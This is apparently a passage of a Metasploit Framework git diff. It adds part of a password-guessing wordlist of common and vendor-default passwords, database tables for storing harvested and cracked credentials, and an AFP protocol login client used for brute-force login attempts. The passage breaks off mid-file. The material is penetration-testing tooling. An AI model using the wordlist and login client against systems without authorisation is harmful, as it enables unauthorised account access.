+poohl
+pookie
+poop
+poopie
+poopoo
+poopy
+popcorn
+popeye
+popidc
+poppy
+porn
+porno
+porsche
+portakal1
+portugal
+postgres
+postmast
+potter
+powder1
+power
+powerapp
+powerdown
+powermax
+powerpower
+ppmax2011
+pr1v4t3
+preciosa
+precious
+prelude
+prepaid
+preston
+pretty
+prettygirl
+primat
+prime
+primenet
+primeos
+primos
+prince
+princes
+princesa
+princesita
+princess
+princess1
+princess2
+princessl
+princesso
+private
+proba123
+progr3ss
+promise
+prost
+protection
+proxy
+prtgadmin
+pswrdpswrd
+psycho
+publ1c
+public
+pumpkin
+punkin
+punkrock
+puppies
+puppy
+puppylove
+purple
+purple1
+purplel
+pussies
+pussy
+pussy1
+pussycat
+pw
+pwp
+pwpw
+pwrchute
+pyramid
+q
+q1q1q1
+q1q1q1q1
+q1q2q3q4
+q1w2e3r4
+q3kze7q
+qaz123
+qaz74123
+qazw1234
+qazwsx
+qazwsx!@#
+qazwsx123
+qazwsx123456
+qazwsxedc
+qazxsw2
+qazxswedc123
+qazzxc
+qpgmr
+qq123456
+qqqitx
+qqqqqq
+qscwdv
+qsecofr
+qserv
+qsrv
+qsrvbas
+qsvr
+qsysopr
+queen
+quepasa
+questra
+quser
+qwas12
+qwe
+qwe123
+qwe123!@#
+qwe123.
+qweQWE123
+qweasd123
+qweasd789
+qweasdzxc2
+qweewq123
+qweqweqwe
+qwer
+qwerqaz
+qwert
+qwert12345
+qwerty
+qwerty09
+qwerty1
+qwerty12
+qwerty123
+qwerty1234567890
+qwerty7
+qwerty77
+qwertyl
+qwertyui
+qwertyuiop
+qwertz123
+r@p8p0r+
+rabbit
+rachael
+rachel
+rachelle
+racing
+radius
+radware
+rafael
+ragnarok
+rahasia
+raider
+raiders
+raidzone
+rainbow
+rais
+ramirez
+ramona
+random
+randy
+randy007
+ranger
+rangers
+raptor
+raquel
+raritan
+rascal
+raspberry
+raven
+raymond
+rayong1234
+rayray
+razor
+rcustpw
+rdc123
+read
+read-only
+read-write
+readwrite
+realmadrid
+rebecca
+rebel
+rebelde
+recover
+recovery
+red
+red123
+reddog
+redhat
+redhead
+redline
+redneck
+redorblue
+redpoint
+redrose
+redrum
+redskins
+redsox
+redwings
+reformation
+reggie
+regina
+regional
+remember
+renee
+replicator
+restoreonly1
+resumix
+revision
+rfnfyf
+ricardo
+richard
+richard#1
+richie
+ricky
+rihanna
+rikitiki
+riley
+ringer
+riobravo
+rivera
+riverhead
+rje
+rmnetlm
+rmon
+rmon_admin
+ro
+robbie
+robert
+roberta
+roberto
+robin
+robinson
+rochelle
+rock
+rocker
+rocket
+rockme
+rocknroll
+rockon
+rocks
+rockstar
+rocku
+rocky
+rockyou
+rodney
+rodopi
+rodrigo
+rodriguez
+roland
+role1
+rollerblade
+rolltide
+roman123
+romance
+romania
+romeo
+ronald
+ronaldinho
+ronaldo
+ronnie
+ronson
+rooney
+rooster
+root
+root123
+root1234
+root4
+roota
+rootadmin
+rootme
+rootpass
+rootroot
+rosario
+rosebud
+rosedale
+roses
+rosie
+rosita
+rotrot
+round123
+router
+roxana
+roxanne
+rsadmin
+ruben
+runder
+runescape
+runner
+rush2112
+russell
+russia
+rusty
+rutabaga
+rw
+rwa
+rwmaint
+ryan
+ryanl
+s!a@m#n$p%c
+s3cret
+s3cur3d
+sabrina
+sadie
+sagitario
+sailor
+saints
+sakura
+salamander
+sales
+sallasana
+sally
+salope
+salvador
+samantha
+sammie
+sammy
+samson
+samsun
+samsung
+samsung34
+samuel
+san-fran
+sanayounes
+sanchez
+sandman
+sandra
+sandy
+sanfran
+santana
+santiago
+santos
+sap123
+sapphire
+sarah
+sarita
+sasha
+sasman
+sassy
+sasuke
+saturn
+savage
+savanna
+savannah
+sayang
+saynomore
+scarface
+school
+scifix
+sclg
+scmchangeme
+scooby
+scoobydoo
+scooter
+scorpio
+scorpion
+scotland
+scott
+scotty
+scout
+scrappy
+scruffy
+sebastian
+secacm
+secofr
+secret
+secure
+secure123
+secure6
+security
+seekanddestroy
+selena
+semmi
+semperfi
+senioro
+september
+serena
+serenity
+sergio
+seri
+serial#
+sertafu
+service
+setmefree
+setup
+setup/nopasswd
+seven
+seventeen
+sexsex
+sexy
+sexy2
+sexy6
+sexybabe
+sexybaby
+sexybitch
+sexygirl
+sexyl
+sexylady
+sexylove
+sexymama
+sexyme
+sexyo
+shadow
+shadow1
+shadowl
+shaggy
+shakira
+shakyamuni
+shalom
+shane
+shannon
+sharon
+shasha
+shaved
+shawn
+shawty
+sheena
+sheila
+shelby
+shelly
+shin
+shineonyou
+shirley
+shit
+shithead
+shiva
+shooter
+shopping
+shorty
+shortyl
+shs
+shuriken
+shutdown
+shutup
+sidney
+siemens123
+siempre!
+sierra
+signa
+silver
+silvia
+simba
+simon
+simonb
+simone
+simple
+simpleplan
+simpson
+simpsons
+singer
+single
+sister
+sisters
+sitecom
+skate
+skater
+skipper
+skippy
+skittles
+skyler
+skyline
+skysky21
+skywalker
+slayer
+sldkj754
+slideshow
+slipknot
+slut
+sluts
+sma
+smallbusiness
+smallville
+smcadmin
+smelly
+smile
+smiles
+smiley
+smith
+smokey
+smooth
+smudge
+snake
+snickers
+sniper
+snmp
+snmp-Trap
+snmpd
+snmptrap
+snoopy
+snowball
+snowflake
+snowman
+snuggles
+soccer
+soccer1
+soccer2
+soccerl
+soccero
+socent
+sofia
+sofresh
+softball
+softballl
+software
+sofuck
+solaris
+soledad
+something
+somtik
+sonia
+sophia
+sophie
+sosict
+soulmate
+southside
+sp99dd
+spacemonkeys
+spanky
+sparkle
+sparky
+special
+specialist
+speedxess
+speedy
+spencer
+spider
+spiderma
+spiderman
+spike
+spike04
+spirit
+spitfire
+spoiled
+sponge
+spongebob
+spooky
+spooml
+sporting
+sports
+spring
+sprite
+sq!us3r
+squ1rrel
+squirt
+srinivas
+ssladmin
+ssp
+stacey
+stanley
+star
+starfish
+stargate
+stark123
+starl
+starlight
+stars
+start123
+startrek
+starwars
+state119
+stay-off
+steaua
+steelers
+stefan
+stella
+steph
+stephanie
+stephen
+steve
+steven
+stevie
+stewart
+sticky
+stingray
+stinky
+storageserver
+store
+stormy
+strasburg
+stratauser
+stratfor
+strawberry
+strike
+stuart
+student
+stupid
+sublime
+success
+suck
+sucker
+suckit
+suckme
+sucks
+sugar
+summer
+summero
+sun
+sun12345
+sunflower
+sunny
+sunset
+sunsh1ne!
+sunshine
+sunshine1
+sunvision
+super
+supergeil
+supergirl
+superman
+superpass
+superstar
+superstart
+superuser
+supervisor
+support
+supportpw
+surecom
+surfer
+surt
+susana
+suzanne
+suzuki
+svcPASS83
+sweet
+sweet16
+sweetheart
+sweetie
+sweetl
+sweetness
+sweetpea
+sweets
+sweety
+swimmer
+swimming
+switch
+swordfis
+swordfish
+sy123456
+sydney
+symantec
+symbol
+sync
+synnet
+sys
+sys/change_on_install
+sysAdmin
+sysadm
+sysadmin
+sysadmpw
+sysbin
+syslib
+sysopr
+syspw
+system
+system1
+system32
+system_admin
+sysu
+t00lk1t
+t00tt00t
+t0ch20x
+t0ch88
+t0m&j3rry
+t0talc0ntr0l4!
+t1m3l0rd
+taco66
+tagada
+tagged
+taki
+talent
+tamara
+tanglefoot
+tania
+tanner
+tarantula1
+tarheels
+tasha
+tasmannet
+tatercounter2000
+tatiana
+tattoo
+taurus
+taylor
+taytay
+tazmania
+tdvcth
+te
+teX1
+teacher
+teamo
+teamomucho
+tech
+technolgi
+teddy
+teddybear
+teen
+teens
+teiubesc
+tekiero
+telco
+tele
+telecom
+telefone
+tellabs#1
+telos
+temp11
+temp1234
+temp12345
+temppass
+tennis
+tequiero
+tequieromucho
+tequila
+teresa
+term1nat0r
+terrell
+terry
+test
+test1
+test100
+test123
+test1234
+test2
+testbed
+tester
+testing
+testpass
+testtest
+texas
+thailand
+the
+thebest
+thegame
+theman
+themaster01
+theone
+theresa
+therock
+theused
+thisisapassword1
+thomas
+three4me
+throwaway
+thuglife
+thumper
+thunder
+thx1138
+tiaranet
+tickle
+tiffany
+tiger
+tiger1
+tiger123
+tigers
+tigger
+tigger1
+tiggerl
+time
+time_out
+timely
+timmy
+timothy
+tini
+tinker
+tinkerbell
+tintin
+tiny
+titanic
+titkos
+tits
+tiv0li
+tivoli
+tivonpw
+tj1234
+tlah
+tmp123
+tokiohotel
+tomcat
+tommy
+tony
+toor
+tootsie
+topgun
+toplayer
+topsecret
+toptop
+tornado@
+torres
+toshy99
+totototo
+touchpwd=
+tour
+toyota
+tr650
+tracey
+trade
+trancell
+trap
+travis
+trendimsa1.0
+trevor
+triangulation
+trinidad
+trinity
+triptrap
+trisha
+tristan
+trixie
+trmcnfg
+trooper
+trouble
+trucks
+truelove
+trustno
+trustno1
+tslinux
+tucker
+tuff1234
+tunix
+turkey
+turnkey
+turtle
+tutor
+tuxalize
+tweety
+tweetybird
+tweetyl
+twilight
+twinkle
+twins
+tyler
+tyrone
+tyson
+uClinux
+uboot
+ucsucs
+umountfs
+umountfsys
+umountsys
+undertaker
+unicorn
+unique
+united
+united123
+united99
+unix
+uplink
+urchin
+user
+user0000
+userNotU
+usher
+usulll
+uucp
+uucpadm
+vagina
+valentin
+valentina
+valentine
+valentino
+valeria
+valerie
+vampire
+vanesa
+vanessa
+vanilla
+vatefairefoutre
+vatten
+vegeta
+venigo
+ventilator
+veronica
+vertex25
+vfnmdfie
+vgnadmin
+vicky
+victor
+victoria
+victory
+video
+vienna12
+vienna88
+viewmaster
+viewuser1
+viking
+vikings
+vince123
+vincent
+violet
+violeta
+viper
+virgin
+virginia
+virginia11
+virgo
+vishal123
+vision
+vision2
+visor
+visual
+vitaly
+vitesse
+vivian
+viviana
+vivivi
+vlis
+voip123
+volcom
+volition
+volleyball
+voodoo
+voyager
+vpasp
+w00tw00t
+w0rkplac3rul3s
+w2402
+w8w00rd
+wachtwoord
+walker
+wallace
+walter
+wampp
+wanker
+wanmei
+warcraft
+warpdrive
+warren
+warrior
+warriors
+water
+waterfire12
+watermelon
+wave123
+wayne
+weasel
+web
+webadmin
+webibm
+weblink
+weblogic
+webmaster
+weeslz
+welcome
+welcome1
+wendimia
+wendy
+wesley
+west123
+westlife
+westside
+wg
+whatever
+white
+whitebird
+whitney
+whore
+whynot
+wibbles
+wicked
+wildcat
+wildcats
+william
+williams
+willie
+willow
+wilson
+windows
+windows7
+winner
+winnie
+winston
+winston1
+winter
+winterm
+wipro123
+wizard
+wjltnt
+wlcsystem
+wlpisystem
+wlsedb
+wlsepassword
+wodj
+woelco
+wolf
+wolfgang
+wolfpack
+wolverin
+wolves
+wombat
+women
+woody
+world
+wrestling
+wrgg15_di524
+write
+wutang
+www
+wyse
+x
+x-admin
+x40rocks
+x6zynd56
+xampp
+xavier
+xbox
+xbox360
+xboxe6
+xceladmin
+xd
+xdfk9874t3
+xdr56tfc
+xerox
+xiazhi
+ximena
+xinmen
+xitgmLwmp
+xljlbj
+xmux
+xo11nE
+xpsm1210
+xunlei
+xupamisto
+xxxx
+xxxxx
+xxxxxx
+xxxxxxxx
+xxyyzz
+xyuxyu
+xyzall
+xyzzy
+yabadabadoo
+yahoo
+yakiniku
+yamaha
+yankee
+yankees
+yasmin
+year2000
+yellow
+yellow123
+yellow22
+yes90125
+yesenia
+yolanda
+yomama
+young
+yourmom
+yourock
+yousuck
+yoyoyo
+ytrewq
+yugioh
+yuiop
+yvette
+yvonne
+yyl
+z0x9c8v7
+zacefron
+zachary
+zaq1@WSX
+zaq1xsw2
+zaq1xsw2cde3
+zaqwsxcde
+zaxscdvf
+zazazaza
+zbaaaca
+zebra
+zeosx
+zero0zero
+zero2hero
+zjaaadc
+zmalqp10
+zodiac666
+zombie
+zoomadsl
+zse4rfv
+zxcpoi123
+zxcvbn
+zxcvbnm
+zzzz
+zzzzzz
diff --git a/lib/zip/test/data/generated/empty.txt b/db/migrate/.git-keep
similarity index 100%
rename from lib/zip/test/data/generated/empty.txt
rename to db/migrate/.git-keep
diff --git a/db/schema.rb b/db/schema.rb
index 42093e6764..ba0fad081a 100644
--- a/db/schema.rb
+++ b/db/schema.rb
@@ -11,7 +11,7 @@
 #
 # It's strongly recommended to check this file into your version control system.
 
-ActiveRecord::Schema.define(:version => 20130717150737) do
+ActiveRecord::Schema.define(:version => 20140801150537) do
 
   create_table "api_keys", :force => true do |t|
     t.text     "token"
@@ -28,6 +28,16 @@ ActiveRecord::Schema.define(:version => 20130717150737) do
     t.datetime "updated_at"
   end
 
+  create_table "credential_cores_tasks", :id => false, :force => true do |t|
+    t.integer "core_id"
+    t.integer "task_id"
+  end
+
+  create_table "credential_logins_tasks", :id => false, :force => true do |t|
+    t.integer "login_id"
+    t.integer "task_id"
+  end
+
   create_table "creds", :force => true do |t|
     t.integer  "service_id",                                    :null => false
     t.datetime "created_at",                                    :null => false
@@ -167,6 +177,113 @@ ActiveRecord::Schema.define(:version => 20130717150737) do
     t.binary   "prefs"
   end
 
+  create_table "metasploit_credential_cores", :force => true do |t|
+    t.integer  "origin_id",                   :null => false
+    t.string   "origin_type",                 :null => false
+    t.integer  "private_id"
+    t.integer  "public_id"
+    t.integer  "realm_id"
+    t.integer  "workspace_id",                :null => false
+    t.datetime "created_at",                  :null => false
+    t.datetime "updated_at",                  :null => false
+    t.integer  "logins_count", :default => 0
+  end
+
+  add_index "metasploit_credential_cores", ["origin_type", "origin_id"], :name => "index_metasploit_credential_cores_on_origin_type_and_origin_id"
+  add_index "metasploit_credential_cores", ["private_id"], :name => "index_metasploit_credential_cores_on_private_id"
+  add_index "metasploit_credential_cores", ["public_id"], :name => "index_metasploit_credential_cores_on_public_id"
+  add_index "metasploit_credential_cores", ["realm_id"], :name => "index_metasploit_credential_cores_on_realm_id"
+  add_index "metasploit_credential_cores", ["workspace_id", "private_id"], :name => "unique_private_metasploit_credential_cores", :unique => true
+  add_index "metasploit_credential_cores", ["workspace_id", "public_id", "private_id"], :name => "unique_realmless_metasploit_credential_cores", :unique => true
+  add_index "metasploit_credential_cores", ["workspace_id", "public_id"], :name => "unique_public_metasploit_credential_cores", :unique => true
+  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "private_id"], :name => "unique_publicless_metasploit_credential_cores", :unique => true
+  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id", "private_id"], :name => "unique_complete_metasploit_credential_cores", :unique => true
+  add_index "metasploit_credential_cores", ["workspace_id", "realm_id", "public_id"], :name => "unique_privateless_metasploit_credential_cores", :unique => true
+  add_index "metasploit_credential_cores", ["workspace_id"], :name => "index_metasploit_credential_cores_on_workspace_id"
+
+  create_table "metasploit_credential_logins", :force => true do |t|
+    t.integer  "core_id",           :null => false
+    t.integer  "service_id",        :null => false
+    t.string   "access_level"
+    t.string   "status",            :null => false
+    t.datetime "last_attempted_at"
+    t.datetime "created_at",        :null => false
+    t.datetime "updated_at",        :null => false
+  end
+
+  add_index "metasploit_credential_logins", ["core_id", "service_id"], :name => "index_metasploit_credential_logins_on_core_id_and_service_id", :unique => true
+  add_index "metasploit_credential_logins", ["service_id", "core_id"], :name => "index_metasploit_credential_logins_on_service_id_and_core_id", :unique => true
+
+  create_table "metasploit_credential_origin_cracked_passwords", :force => true do |t|
+    t.integer  "metasploit_credential_core_id", :null => false
+    t.datetime "created_at",                    :null => false
+    t.datetime "updated_at",                    :null => false
+  end
+
+  add_index "metasploit_credential_origin_cracked_passwords", ["metasploit_credential_core_id"], :name => "originating_credential_cores"
+
+  create_table "metasploit_credential_origin_imports", :force => true do |t|
+    t.text     "filename",   :null => false
+    t.integer  "task_id"
+    t.datetime "created_at", :null => false
+    t.datetime "updated_at", :null => false
+  end
+
+  add_index "metasploit_credential_origin_imports", ["task_id"], :name => "index_metasploit_credential_origin_imports_on_task_id"
+
+  create_table "metasploit_credential_origin_manuals", :force => true do |t|
+    t.integer  "user_id",    :null => false
+    t.datetime "created_at", :null => false
+    t.datetime "updated_at", :null => false
+  end
+
+  add_index "metasploit_credential_origin_manuals", ["user_id"], :name => "index_metasploit_credential_origin_manuals_on_user_id"
+
+  create_table "metasploit_credential_origin_services", :force => true do |t|
+    t.integer  "service_id",       :null => false
+    t.text     "module_full_name", :null => false
+    t.datetime "created_at",       :null => false
+    t.datetime "updated_at",       :null => false
+  end
+
+  add_index "metasploit_credential_origin_services", ["service_id", "module_full_name"], :name => "unique_metasploit_credential_origin_services", :unique => true
+
+  create_table "metasploit_credential_origin_sessions", :force => true do |t|
+    t.text     "post_reference_name", :null => false
+    t.integer  "session_id",          :null => false
+    t.datetime "created_at",          :null => false
+    t.datetime "updated_at",          :null => false
+  end
+
+  add_index "metasploit_credential_origin_sessions", ["session_id", "post_reference_name"], :name => "unique_metasploit_credential_origin_sessions", :unique => true
+
+  create_table "metasploit_credential_privates", :force => true do |t|
+    t.string   "type",       :null => false
+    t.text     "data",       :null => false
+    t.datetime "created_at", :null => false
+    t.datetime "updated_at", :null => false
+    t.string   "jtr_format"
+  end
+
+  add_index "metasploit_credential_privates", ["type", "data"], :name => "index_metasploit_credential_privates_on_type_and_data", :unique => true
+
+  create_table "metasploit_credential_publics", :force => true do |t|
+    t.string   "username",   :null => false
+    t.datetime "created_at", :null => false
+    t.datetime "updated_at", :null => false
+  end
+
+  add_index "metasploit_credential_publics", ["username"], :name => "index_metasploit_credential_publics_on_username", :unique => true
+
+  create_table "metasploit_credential_realms", :force => true do |t|
+    t.string   "key",        :null => false
+    t.string   "value",      :null => false
+    t.datetime "created_at", :null => false
+    t.datetime "updated_at", :null => false
+  end
+
+  add_index "metasploit_credential_realms", ["key", "value"], :name => "index_metasploit_credential_realms_on_key_and_value", :unique => true
+
   create_table "mod_refs", :force => true do |t|
     t.string "module", :limit => 1024
     t.string "mtype",  :limit => 128
diff --git a/lib/fastlib.rb b/lib/fastlib.rb
index efbff68c29..7af9bafa20 100755
--- a/lib/fastlib.rb
+++ b/lib/fastlib.rb
@@ -378,6 +378,10 @@ module Kernel #:nodoc:all
   # This method handles the loading of FASTLIB archives
   #
   def fastlib_require(name)
+    if name.respond_to? :to_path
+      name = name.to_path
+    end
+
     name = name + ".rb" if not name =~ /\.rb$/
     return false if fastlib_already_loaded?(name)
     return false if fastlib_already_tried?(name)
diff --git a/lib/metasploit/framework.rb b/lib/metasploit/framework.rb
index f30e4d4399..1555b00532 100644
--- a/lib/metasploit/framework.rb
+++ b/lib/metasploit/framework.rb
@@ -1,3 +1,29 @@
+#
+# Gems
+#
+# gems must load explicitly any gem declared in gemspec
+# @see https://github.com/bundler/bundler/issues/2018#issuecomment-6819359
+#
+
+require 'active_support'
+require 'bcrypt'
+require 'json'
+require 'msgpack'
+require 'metasploit/model'
+require 'nokogiri'
+require 'packetfu'
+# railties has not autorequire defined
+# rkelly-remix is a fork of rkelly, so it's autorequire is 'rkelly' and not 'rkelly-remix'
+require 'rkelly'
+require 'robots'
+require 'zip'
+
+#
+# Project
+#
+
+require 'msf/core'
+
 # Top-level namespace that is shared between {Metasploit::Framework
 # metasploit-framework} and pro, which uses Metasploit::Pro.
 module Metasploit
@@ -5,30 +31,6 @@ module Metasploit
   # works in compatible manner with activerecord's rake tasks and other
   # railties.
   module Framework
-    # Returns the environment for {Metasploit::Framework}.  Checks
-    # `METASPLOIT_FRAMEWORK_ENV` environment variable for value.  Defaults to
-    # `'development'` if `METASPLOIT_FRAMEWORK_ENV` is not set in the
-    # environment variables.
-    #
-    # {env} is a ActiveSupport::StringInquirer like `Rails.env` so it can be
-    # queried for its value.
-    #
-    # @example check if environment is development
-    #   if Metasploit::Framework.env.development?
-    #     # runs only when in development
-    #   end
-    #
-    # @return [ActiveSupport::StringInquirer] the environment name
-    def self.env
-      unless instance_variable_defined? :@env
-        name = ENV['METASPLOIT_FRAMEWORK_ENV']
-        name ||= 'development'
-        @env = ActiveSupport::StringInquirer.new(name)
-      end
-
-      @env
-    end
-
     # Returns the root of the metasploit-framework project.  Use in place of
     # `Rails.root`.
     #
@@ -42,4 +44,4 @@ module Metasploit
       @root
     end
   end
-end
\ No newline at end of file
+end
diff --git a/lib/metasploit/framework/afp/client.rb b/lib/metasploit/framework/afp/client.rb
new file mode 100644
index 0000000000..2bc578d7a7
--- /dev/null
+++ b/lib/metasploit/framework/afp/client.rb
@@ -0,0 +1,323 @@
+# -*- coding: binary -*-
+require 'msf/core'
+require 'msf/core/exploit/tcp'
+
+module Metasploit
+  module Framework
+    module AFP
+      module Client
+
+        def next_id
+          @request_id ||= -1
+          @request_id += 1
+
+          @request_id
+        end
+
+        def get_info
+          packet =  "\00"    # Flag: Request
+          packet << "\x03"   # Command: FPGetSrvrInfo
+          packet << [next_id].pack('n') # requestID
+          packet << "\x00\x00\x00\x00" # Data offset
+          packet << "\x00\x00\x00\x00" # Length
+          packet << "\x00\x00\x00\x00" # Reserved
+
+          sock.put(packet)
+
+          response = sock.timed_read(1024)
+          return parse_info_response(response)
+        end
+
+        def open_session
+          packet =  "\00"              # Flag: Request
+          packet << "\x04"             # Command: DSIOpenSession
+          packet << [next_id].pack('n') # requestID
+          packet << "\x00\x00\x00\x00" # Data offset
+          packet << "\x00\x00\x00\x06" # Length
+          packet << "\x00\x00\x00\x00" # Reserved
+          packet << "\x01"             # Attention Quantum
+          packet << "\x04"             # Length
+          packet << "\x00\x00\x04\x00" # 1024
+
+          sock.put(packet)
+
+          response = sock.timed_read(1024)
+          return parse_open_session_response(response)
+        end
+
+        def login(user, pass)
+          if user == ''
+            return no_user_authent_login
+          end
+
+          p = OpenSSL::BN.new("BA2873DFB06057D43F2024744CEEE75B", 16)
+          g = OpenSSL::BN.new("7", 10)
+          ra = OpenSSL::BN.new('86F6D3C0B0D63E4B11F113A2F9F19E3BBBF803F28D30087A1450536BE979FD42', 16)
+          ma = g.mod_exp(ra, p)
+
+          padded_user = (user.length + 1) % 2 != 0 ? user + "\x00" : user
+          bin_user = [padded_user.length, padded_user].pack("Ca*")
+
+          length = 18 + bin_user.length + ma.to_s(2).length
+
+          packet =  "\00"              # Flag: Request
+          packet << "\x02"             # Command: DSICommand
+          packet << [next_id].pack('n') # requestID
+          packet << "\x00\x00\x00\x00" # Data offset
+          packet << [length].pack('N') # Length (42)
+          packet << "\x00\x00\x00\x00" # Reserved
+          packet << "\x12"             # AFPCommand: FPLogin (18)
+          packet << "\x06\x41\x46\x50\x33\x2e\x31" # AFPVersion: AFP3.1
+          packet << "\x09\x44\x48\x43\x41\x53\x54\x31\x32\x38" #UAM: DHCAST128
+          packet << bin_user           # username
+          packet << ma.to_s(2)         # random number
+
+          sock.put(packet)
+
+          begin
+            response = sock.timed_read(1024, self.login_timeout)
+          rescue Timeout::Error
+            #vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)")
+            return :connection_error
+          end
+
+          flags, command, request_id, error_code, length, reserved = parse_header(response)
+
+          case error_code
+          when -5001 #kFPAuthContinue
+            return parse_login_response_add_send_login_count(response, {:p => p, :g => g, :ra => ra, :ma => ma,
+                                                                        :password => pass, :user => user})
+          when -5023 #kFPUserNotAuth (User dosen't exists)
+            #print_status("AFP #{rhost}:#{rport} User #{user} dosen't exists")
+            return :skip_user
+          else
+            return :connection_error
+          end
+
+        end
+
+        def close_session
+          packet =  "\00"              # Flag: Request
+          packet << "\x01"             # Command: DSICloseSession
+          packet << [next_id].pack('n')    # requestID
+          packet << "\x00\x00\x00\x00" #Data offset
+          packet << "\x00\x00\x00\x00" #Length
+          packet << "\x00\x00\x00\x00" #Reserved
+
+          sock.put(packet)
+        end
+
+        def no_user_authent_login
+          packet =  "\00"              # Flag: Request
+          packet << "\x02"             # Command: DSICommand
+          packet << [next_id].pack('n')    # requestID
+          packet << "\x00\x00\x00\x00" # Data offset
+          packet << "\x00\x00\x00\x18" # Length (24)
+          packet << "\x00\x00\x00\x00" # Reserved
+          packet << "\x12"             # AFPCommand: FPLogin (18)
+          packet << "\x06\x41\x46\x50\x33\x2e\x31" #AFP3.1
+          packet << "\x0f\x4e\x6f\x20\x55\x73\x65\x72\x20\x41\x75\x74\x68\x65\x6e\x74" #UAM: No User Authent
+
+          sock.put(packet)
+
+          begin
+            response = sock.timed_read(1024, self.login_timeout)
+          rescue Timeout::Error
+            vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)")
+            return :connection_error
+          end
+
+          flags, command, request_id, error_code, length, reserved = parse_header(response)
+
+          if error_code == 0
+            return :true
+          else
+            return false
+          end
+        end
+
+        def parse_login_response_add_send_login_count(response, data)
+          dhx_s2civ = 'CJalbert'
+          dhx_c2civ = 'LWallace'
+
+          flags, command, request_id, error_code, length, reserved = parse_header(response)
+          body = get_body(response, length)
+          id, mb, enc_data = body.unpack("nH32a*")
+
+          mb = OpenSSL::BN.new(mb, 16)
+          k = mb.mod_exp(data[:ra], data[:p] )
+
+          cipher = OpenSSL::Cipher.new('cast5-cbc').decrypt
+          cipher.key = k.to_s(2)
+          cipher.iv = dhx_s2civ
+          cipher.padding = 0
+
+          nonce = cipher.update(enc_data)
+          nonce << cipher.final
+          nonce = nonce[0..15]
+          nonce = OpenSSL::BN.new(nonce, 2) + 1
+
+          plain_text = nonce.to_s(2) + data[:password].ljust(64, "\x00")
+          cipher = OpenSSL::Cipher.new('cast5-cbc').encrypt
+          cipher.key = k.to_s(2)
+          cipher.iv = dhx_c2civ
+          auth_response = cipher.update(plain_text)
+          auth_response << cipher.final
+
+          packet =  "\00"              # Flag: Request
+          packet << "\x02"             # Command: DSICommand
+          packet << [next_id].pack('n')    # requestID
+          packet << "\x00\x00\x00\x00" # Data offset
+          packet << [auth_response.length + 2].pack("N")  # Length
+          packet << "\x00\x00\x00\x00" # Reserved
+          packet << "\x13"             # AFPCommand: FPLoginCont (19)
+          packet << "\x00"
+          packet << [id].pack('n')
+          packet << auth_response
+
+          sock.put(packet)
+
+          begin
+            response = sock.timed_read(1024, self.login_timeout)
+          rescue Timeout::Error
+            vprint_error("AFP #{rhost}:#{rport} Login timeout (AFP server delay response for 20 - 22 seconds after 7 incorrect logins)")
+            return :connection_error
+          end
+
+          flags, command, request_id, error_code, length, reserved = parse_header(response)
+          if error_code == 0
+            return true
+          else
+            return false
+          end
+        end
+
+        def parse_open_session_response(response)
+          _, _, _, error_code, _, _ = parse_header(response)
+          return error_code == 0 ? true : false
+        end
+
+        def parse_info_response(response)
+          parsed_data = {}
+
+          flags, command, request_id, error_code, length, reserved = parse_header(response)
+          raise "AFP #{rhost}:#{rport} Server response with error" if error_code != 0
+          body = get_body(response, length)
+          machine_type_offset, afp_versions_offset, uam_count_offset, icon_offset, server_flags =
+            body.unpack('nnnnn')
+
+          server_name_length = body.unpack('@10C').first
+          parsed_data[:server_name] = body.unpack("@11A#{server_name_length}").first
+
+          pos = 11 + server_name_length
+          pos += 1 if pos % 2 != 0 #padding
+
+          server_signature_offset, network_addresses_offset, directory_names_offset,
+            utf8_servername_offset = body.unpack("@#{pos}nnnn")
+
+          parsed_data[:machine_type] = read_pascal_string(body, machine_type_offset)
+          parsed_data[:versions] = read_array(body, afp_versions_offset)
+          parsed_data[:uams] = read_array(body, uam_count_offset)
+          # skiped icon
+          parsed_data[:server_flags] = parse_flags(server_flags)
+          parsed_data[:signature] = body.unpack("@#{server_signature_offset}H32").first
+
+          network_addresses = read_array(body, network_addresses_offset, true)
+          parsed_data[:network_addresses] = parse_network_addresses(network_addresses)
+          # skiped directory names
+          #Error catching for offset issues on this field. Need better error ahndling all through here
+          begin
+            parsed_data[:utf8_server_name] = read_utf8_pascal_string(body, utf8_servername_offset)
+          rescue
+            parsed_data[:utf8_server_name] = "N/A"
+          end
+
+          return parsed_data
+        end
+
+        def parse_header(packet)
+          header = packet.unpack('CCnNNN') #ruby 1.8.7 don't support unpacking signed integers in big-endian order
+          header[3] = packet[4..7].reverse.unpack("l").first
+          return header
+        end
+
+        def get_body(packet, body_length)
+          body = packet[16..body_length + 15]
+          raise "AFP #{rhost}:#{rport} Invalid body length" if body.length != body_length
+          return body
+        end
+
+        def read_pascal_string(str, offset)
+          length = str.unpack("@#{offset}C").first
+          return str.unpack("@#{offset + 1}A#{length}").first
+        end
+
+        def read_utf8_pascal_string(str, offset)
+          length = str.unpack("@#{offset}n").first
+          return str[offset + 2..offset + length + 1]
+        end
+
+        def read_array(str, offset, afp_network_address=false)
+          size = str.unpack("@#{offset}C").first
+          pos = offset + 1
+
+          result = []
+          size.times do
+            result << read_pascal_string(str, pos)
+            pos += str.unpack("@#{pos}C").first
+            pos += 1 unless afp_network_address
+          end
+          return result
+        end
+
+        def parse_network_addresses(network_addresses)
+          parsed_addreses = []
+          network_addresses.each do |address|
+            case address.unpack('C').first
+            when 0 #Reserved
+              next
+            when 1 # Four-byte IP address
+              parsed_addreses << IPAddr.ntop(address[1..4]).to_s
+            when 2 # Four-byte IP address followed by a two-byte port number
+              parsed_addreses <<  "#{IPAddr.ntop(address[1..4])}:#{address[5..6].unpack("n").first}"
+            when 3 # DDP address (depricated)
+              next
+            when 4 # DNS name (maximum of 254 bytes)
+              parsed_addreses << address[1..address.length - 1]
+            when 5 # This functionality is deprecated.
+              next
+            when 6 # IPv6 address (16 bytes)
+              parsed_addreses << "[#{IPAddr.ntop(address[1..16])}]"
+            when 7 # IPv6 address (16 bytes) followed by a two-byte port number
+              parsed_addreses << "[#{IPAddr.ntop(address[1..16])}]:#{address[17..18].unpack("n").first}"
+            else   # Something wrong?
+              raise "Error parsing network addresses"
+            end
+          end
+          return parsed_addreses
+        end
+
+        def parse_flags(flags)
+          flags = flags.to_s(2)
+          result = {}
+          result['Super Client'] = flags[0,1] == '1' ? true : false
+          result['UUIDs'] = flags[5,1] == '1' ? true : false
+          result['UTF8 Server Name'] = flags[6,1] == '1' ? true : false
